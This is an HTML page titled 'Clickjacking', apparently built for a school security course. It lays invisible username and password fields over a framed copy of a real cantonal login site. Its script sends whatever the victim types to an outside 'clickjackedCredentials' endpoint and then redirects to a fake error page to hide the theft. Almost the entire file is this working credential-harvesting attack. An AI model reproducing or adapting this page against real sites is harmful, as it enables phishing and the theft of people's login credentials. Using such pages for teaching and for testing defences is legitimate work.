<!DOCTYPE html>
<html lang="de">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Clickjacking</title>

    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            overflow: hidden;
        }

        .iframe {
            position: absolute;
            top: 0;
            left: 0;
            height: 100%;
            width: 100%;
            opacity: 0.98;
            z-index: 0;
            pointer-events: none;
        }

        #username {
            width: 360px;
            height: 1px;
            padding: 12px;
            margin-top: 12.2%;
            z-index: 1;
            position: absolute;
        }

        #password {
            height: 1px;
            width: 360px;
            padding: 12px;
            margin-top: 15%;
            z-index: 1;
            position: absolute;
        }

        #submit-btn {
            width: 85px;
            height: 23px;
            margin-top: 18.3%;
            z-index: 1;
        }

        #myform {
            opacity: 1;
            z-index: 10;
            margin-left: 40%;
            font-size: 16px;
            font-family: Arial, Helvetica, sans-serif;
        }
    </style>
</head>
<body>
    <form method="POST" accept-charset="utf-8" action="" id="myform">
        <input id="username" autocomplete="off" type="text">
        <input id="password" autocomplete="off" type="password">
        <button type="submit" id="submit-btn">Anmelden</button>
    </form>

    <script type="text/javascript">
        // Set autofocus on the fake form
        window.onload = () => {
            document.getElementById("username").focus();
        };
    
        // Fake submit button got pressed
        document.getElementById("myform").addEventListener("submit", function (e) {
            e.preventDefault();
            e.stopPropagation();
            if (e.target && e.target.id == "myform") {
                // save values of the input boxes
                var username = document.getElementById("username").value;
                var password = document.getElementById("password").value;

                console.log("Sent: ", username, password);
                
                // send data to the server
                var xhr = new XMLHttpRequest();
                xhr.open('POST', 'https://m183.gibz-informatik.ch/api/clickjackedCredentials');
                xhr.setRequestHeader('Content-Type', 'application/json');
                xhr.send(JSON.stringify({
                    "source": "https://gibz.zg.ch",
                    "username": username,
                    "password": password
                })); 

                // redirect the user to an actual error page
                window.location.href = "https://www.zg.ch/wrongLogin";
            }
        })
    </script>
    <iframe src="https://gibz.zg.ch" class="iframe" />
</body>

</html>